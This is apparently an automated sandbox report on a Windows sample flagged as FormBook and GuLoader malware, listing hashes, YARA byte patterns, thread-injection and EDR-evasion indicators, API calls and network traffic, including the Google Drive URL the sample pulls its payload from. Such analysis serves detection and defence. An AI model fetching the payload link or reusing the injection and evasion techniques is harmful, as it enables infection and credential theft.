
Windows Analysis Report
LkzvfB4VFj.exe

Overview

General Information

Sample name: LkzvfB4VFj.exe
Analysis ID: 1552178
MD5: a5104b4d665dc081181fd163dce0bb77
SHA1: e72855a64aace2ecf6aa008942e443d2ac7508d7
SHA256: aa047fd2e21f33564c1178d063122fc9368afc5c6a5455c4381a3f5edde4b145

Detection

FormBook, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Yara detected GuLoader
Found direct / indirect Syscall (likely to bypass EDR)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
PE / OLE file has an invalid certificate
Sample file is different from the original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64native
  • LkzvfB4VFj.exe (PID: 2368 cmdline: "C:\Users\user\Desktop\LkzvfB4VFj.exe" MD5: A5104B4D665DC081181FD163DCE0BB77)
    • LkzvfB4VFj.exe (PID: 3100 cmdline: "C:\Users\user\Desktop\LkzvfB4VFj.exe" MD5: A5104B4D665DC081181FD163DCE0BB77)
      • RAVCpl64.exe (PID: 4376 cmdline: "C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s MD5: 731FB4B2E5AFBCADAABB80D642E056AC)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000003.00000002.93680274957.0000000035BF0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000003.00000002.93680274957.0000000035BF0000.00000004.00001000.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2bc40:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13cff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000000.00000002.92764803526.0000000005D64000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security

No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-08T14:23:31.460462+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.11.20 | 49762 | 142.250.72.110 | 443 | TCP


AV Detection

Source: LkzvfB4VFj.exe | Avira: detected
Source: LkzvfB4VFj.exe | ReversingLabs: Detection: 55%
Source: Yara match | File source: 00000003.00000002.93680274957.0000000035BF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: LkzvfB4VFj.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 142.250.72.110:443 -> 192.168.11.20:49762 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 142.250.65.225:443 -> 192.168.11.20:49763 version: TLS 1.2
Source: LkzvfB4VFj.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: mshtml.pdb source: LkzvfB4VFj.exe, 00000003.00000001.92670024894.0000000000649000.00000020.00000001.01000000.00000006.sdmp
Source: Binary string: wntdll.pdbUGP source: LkzvfB4VFj.exe, 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmp, LkzvfB4VFj.exe, 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, LkzvfB4VFj.exe, 00000003.00000003.93041084004.0000000035BF3000.00000004.00000020.00020000.00000000.sdmp, LkzvfB4VFj.exe, 00000003.00000003.93044327286.0000000035DAC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: LkzvfB4VFj.exe, LkzvfB4VFj.exe, 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmp, LkzvfB4VFj.exe, 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, LkzvfB4VFj.exe, 00000003.00000003.93041084004.0000000035BF3000.00000004.00000020.00020000.00000000.sdmp, LkzvfB4VFj.exe, 00000003.00000003.93044327286.0000000035DAC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mshtml.pdbUGP source: LkzvfB4VFj.exe, 00000003.00000001.92670024894.0000000000649000.00000020.00000001.01000000.00000006.sdmp
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 0_2_0040646B FindFirstFileA,FindClose
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 0_2_004027A1 FindFirstFileA
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 0_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 4x nop then mov ebx, 00000004h | 3_2_05C804DE
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 4x nop then mov ebx, 00000004h | 3_2_35C804DE
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 4x nop then mov ebx, 00000004h | 3_2_35CE04DE
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49762 -> 142.250.72.110:443
Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=18FXQaaqaUFSIPXdu_u34XlulgDX2i5H6 HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
  Host: drive.google.com
  Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /download?id=18FXQaaqaUFSIPXdu_u34XlulgDX2i5H6&export=download HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
  Cache-Control: no-cache
  Host: drive.usercontent.google.com
  Connection: Keep-Alive
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=18FXQaaqaUFSIPXdu_u34XlulgDX2i5H6 HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
  Host: drive.google.com
  Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /download?id=18FXQaaqaUFSIPXdu_u34XlulgDX2i5H6&export=download HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
  Cache-Control: no-cache
  Host: drive.usercontent.google.com
  Connection: Keep-Alive
Source: global traffic | DNS traffic detected: DNS query: drive.google.com
Source: global traffic | DNS traffic detected: DNS query: drive.usercontent.google.com
Source: LkzvfB4VFj.exe, 00000003.00000003.93041945813.0000000005DA7000.00000004.00000020.00020000.00000000.sdmp, LkzvfB4VFj.exe, 00000003.00000002.93669076974.0000000005DAA000.00000004.00000020.00020000.00000000.sdmp, LkzvfB4VFj.exe, 00000003.00000003.92730858345.0000000005DAA000.00000004.00000020.00020000.00000000.sdmp, LkzvfB4VFj.exe, 00000003.00000003.92761352469.0000000005DAA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: LkzvfB4VFj.exe, 00000003.00000003.93041945813.0000000005DA7000.00000004.00000020.00020000.00000000.sdmp, LkzvfB4VFj.exe, 00000003.00000002.93669076974.0000000005DAA000.00000004.00000020.00020000.00000000.sdmp, LkzvfB4VFj.exe, 00000003.00000003.92730858345.0000000005DAA000.00000004.00000020.00020000.00000000.sdmp, LkzvfB4VFj.exe, 00000003.00000003.92761352469.0000000005DAA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: LkzvfB4VFj.exe, 00000003.00000001.92670024894.0000000000649000.00000020.00000001.01000000.00000006.sdmp | String found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
Source: LkzvfB4VFj.exe | String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: LkzvfB4VFj.exe | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: LkzvfB4VFj.exe, 00000003.00000001.92670024894.0000000000649000.00000020.00000001.01000000.00000006.sdmp | String found in binary or memory: http://www.gopher.ftp://ftp.
Source: LkzvfB4VFj.exe, 00000003.00000001.92670024894.0000000000626000.00000020.00000001.01000000.00000006.sdmp | String found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
Source: LkzvfB4VFj.exe, 00000003.00000003.93041945813.0000000005DA7000.00000004.00000020.00020000.00000000.sdmp, LkzvfB4VFj.exe, 00000003.00000002.93669076974.0000000005DAA000.00000004.00000020.00020000.00000000.sdmp, LkzvfB4VFj.exe, 00000003.00000003.92730858345.0000000005DAA000.00000004.00000020.00020000.00000000.sdmp, LkzvfB4VFj.exe, 00000003.00000003.92761352469.0000000005DAA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.quovadis.bm0
Source: LkzvfB4VFj.exe, 00000003.00000001.92670024894.00000000005F2000.00000020.00000001.01000000.00000006.sdmp | String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
Source: LkzvfB4VFj.exe, 00000003.00000001.92670024894.00000000005F2000.00000020.00000001.01000000.00000006.sdmp | String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
Source: LkzvfB4VFj.exe, 00000003.00000003.92730858345.0000000005DAA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://apis.google.com
Source: LkzvfB4VFj.exe, 00000003.00000002.93668767945.0000000005D28000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/
Source: LkzvfB4VFj.exe, 00000003.00000002.93668767945.0000000005D28000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/.
Source: LkzvfB4VFj.exe, 00000003.00000002.93678949713.0000000035320000.00000004.00001000.00020000.00000000.sdmp, LkzvfB4VFj.exe, 00000003.00000002.93668767945.0000000005D28000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/uc?export=download&id=18FXQaaqaUFSIPXdu_u34XlulgDX2i5H6
Source: LkzvfB4VFj.exe, 00000003.00000002.93668767945.0000000005D28000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/uc?export=download&id=18FXQaaqaUFSIPXdu_u34XlulgDX2i5H6Wqu_
Source: LkzvfB4VFj.exe, 00000003.00000003.93041945813.0000000005DA7000.00000004.00000020.00020000.00000000.sdmp, LkzvfB4VFj.exe, 00000003.00000002.93669076974.0000000005DAA000.00000004.00000020.00020000.00000000.sdmp, LkzvfB4VFj.exe, 00000003.00000003.92761352469.0000000005DAA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/
Source: LkzvfB4VFj.exe, 00000003.00000003.93041945813.0000000005DA7000.00000004.00000020.00020000.00000000.sdmp, LkzvfB4VFj.exe, 00000003.00000002.93669076974.0000000005DAA000.00000004.00000020.00020000.00000000.sdmp, LkzvfB4VFj.exe, 00000003.00000003.92761352469.0000000005DAA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/T
Source: LkzvfB4VFj.exe, 00000003.00000003.92761499031.0000000005DED000.00000004.00000020.00020000.00000000.sdmp, LkzvfB4VFj.exe, 00000003.00000003.93042110969.0000000005D91000.00000004.00000020.00020000.00000000.sdmp, LkzvfB4VFj.exe, 00000003.00000003.93041945813.0000000005DA7000.00000004.00000020.00020000.00000000.sdmp, LkzvfB4VFj.exe, 00000003.00000002.93669076974.0000000005DAA000.00000004.00000020.00020000.00000000.sdmp, LkzvfB4VFj.exe, 00000003.00000003.92730858345.0000000005DAA000.00000004.00000020.00020000.00000000.sdmp, LkzvfB4VFj.exe, 00000003.00000003.92761352469.0000000005DAA000.00000004.00000020.00020000.00000000.sdmp, LkzvfB4VFj.exe, 00000003.00000003.93041617359.0000000005DEE000.00000004.00000020.00020000.00000000.sdmp, LkzvfB4VFj.exe, 00000003.00000002.93669076974.0000000005DEE000.00000004.00000020.00020000.00000000.sdmp, LkzvfB4VFj.exe, 00000003.00000002.93669076974.0000000005D91000.00000004.00000020.00020000.00000000.sdmp, LkzvfB4VFj.exe, 00000003.00000003.93041945813.0000000005DEE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/download?id=18FXQaaqaUFSIPXdu_u34XlulgDX2i5H6&export=download
Source: LkzvfB4VFj.exe, 00000003.00000002.93669076974.0000000005D8B000.00000004.00000020.00020000.00000000.sdmp, LkzvfB4VFj.exe, 00000003.00000003.93041780231.0000000005D8A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/download?id=18FXQaaqaUFSIPXdu_u34XlulgDX2i5H6&export=downloadP
Source: LkzvfB4VFj.exe, 00000003.00000003.93041945813.0000000005DA7000.00000004.00000020.00020000.00000000.sdmp, LkzvfB4VFj.exe, 00000003.00000002.93669076974.0000000005DAA000.00000004.00000020.00020000.00000000.sdmp, LkzvfB4VFj.exe, 00000003.00000003.92761352469.0000000005DAA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/download?id=18FXQaaqaUFSIPXdu_u34XlulgDX2i5H6&export=downloade
Source: LkzvfB4VFj.exe, 00000003.00000001.92670024894.0000000000649000.00000020.00000001.01000000.00000006.sdmp | String found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
Source: LkzvfB4VFj.exe, 00000003.00000003.93041945813.0000000005DA7000.00000004.00000020.00020000.00000000.sdmp, LkzvfB4VFj.exe, 00000003.00000002.93669076974.0000000005DAA000.00000004.00000020.00020000.00000000.sdmp, LkzvfB4VFj.exe, 00000003.00000003.92730858345.0000000005DAA000.00000004.00000020.00020000.00000000.sdmp, LkzvfB4VFj.exe, 00000003.00000003.92761352469.0000000005DAA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: LkzvfB4VFj.exe, 00000003.00000003.92730858345.0000000005DAA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ssl.gstatic.com
Source: LkzvfB4VFj.exe, 00000003.00000003.92730858345.0000000005DAA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google-analytics.com;report-uri
Source: LkzvfB4VFj.exe, 00000003.00000003.92730858345.0000000005DAA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com
Source: LkzvfB4VFj.exe, 00000003.00000003.92730858345.0000000005DAA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.googletagmanager.com
Source: LkzvfB4VFj.exe, 00000003.00000003.92730858345.0000000005DAA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.gstatic.com
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown | Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown | HTTPS traffic detected: 142.250.72.110:443 -> 192.168.11.20:49762 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 142.250.65.225:443 -> 192.168.11.20:49763 version: TLS 1.2
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 0_2_0040535C GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard

E-Banking Fraud

Source: Yara match | File source: 00000003.00000002.93680274957.0000000035BF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

System Summary

Source: 00000003.00000002.93680274957.0000000035BF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_35FD34E0 NtCreateMutant,LdrInitializeThunk
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_35FD2D10 NtQuerySystemInformation,LdrInitializeThunk
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_35FD2EB0 NtProtectVirtualMemory,LdrInitializeThunk
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_35FD2BC0 NtQueryInformationToken,LdrInitializeThunk
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_35FD2B90 NtFreeVirtualMemory,LdrInitializeThunk
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_35FD3C90 NtOpenThread
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_35FD3C30 NtOpenProcessToken
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_35FD38D0 NtGetContextThread
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_35FD4570 NtSuspendThread
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_35FD4260 NtSetContextThread
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_35FD2DC0 NtAdjustPrivilegesToken
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_35FD2DA0 NtReadVirtualMemory
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_35FD2D50 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_35FD2CF0 NtDelayExecution
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_35FD2CD0 NtEnumerateKey
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_35FD2C50 NtUnmapViewOfSection
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_35FD2C30 NtMapViewOfSection
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_35FD2C20 NtSetInformationFile
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_35FD2C10 NtOpenProcess
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_35FD2FB0 NtSetValueKey
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_35FD2F30 NtOpenDirectoryObject
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_35FD2F00 NtCreateFile
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_35FD2ED0 NtResumeThread
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_35FD2EC0 NtQuerySection
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_35FD2E80 NtCreateProcessEx
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_35FD2E50 NtCreateSection
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_35FD2E00 NtQueueApcThread
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_35FD29F0 NtReadFile
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_35FD29D0 NtWaitForSingleObject
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_35FD2BE0 NtQueryVirtualMemory
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_35FD2B80 NtCreateKey
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_35FD2B20 NtQueryInformationProcess
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_35FD2B10 NtAllocateVirtualMemory
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_35FD2B00 NtQueryValueKey
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_35FD2AC0 NtEnumerateValueKey
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_35FD2AA0 NtQueryInformationFile
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_35FD2A80 NtClose
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_35FD2A10 NtWriteFile
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_05C93471 NtSetContextThread
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_05C93781 NtSuspendThread
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_05C93A93 NtResumeThread
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_35C93471 NtSetContextThread
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_35C93781 NtSuspendThread
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_35C93A93 NtResumeThread
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_35CF3471 NtSetContextThread
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_35CF3781 NtSuspendThread
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_35CF3A93 NtResumeThread
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | File created: C:\Windows\resources\0409
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | File created: C:\Windows\Arder.lnk
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 0_2_00406945
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 0_2_0040711C
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 0_2_6FEB1A98
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_3603D62C
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_3604D646
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_360136EC
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_3605F6F6
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_3600D480
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_360575C6
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_3605F5C9
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_35FBB1E0
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_35FA51C0
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_3605124C
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_35FE717A
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_35F8F113
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_35FAB0D0
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_3605F330
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_35FD508C
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_35F91380
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_360570F1
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_35F8D2EC
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_3603D130
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_35FA9DD0
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_36059ED2
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_35FBFCE0
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_3601FF40
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_3605FF63
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_35FA3C60
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_36051FC6
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_36039C98
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_36027CE8
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_3605FD27
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_35FA1EB2
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_36057D4C
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_3603FDF4
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_35FE59C0
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_3605FA89
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_3605FB2E
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_35FA9870
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_35FBB870
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_35FA3800
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_36015870
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_3605F872
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_360198B2
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_360518DA
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_35FDDB19
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_360578F3
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_35FBFAA0
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_3605A6C0
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_36056757
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_35FA0445
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_35FA2760
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_35FAA760
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_35F9C6E0
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_3606A526
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_35FA0680
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_35FC4670
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_35FBC600
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_35F900A0
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_3604C3FC
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_3604E076
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_35FAE310
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_3606010E
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_35FB2DB0
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_36040E6D
Source: C:\Users\user\Desktop\LkzvfB4VFj.exe | Code function: 3_2_35FA0D69
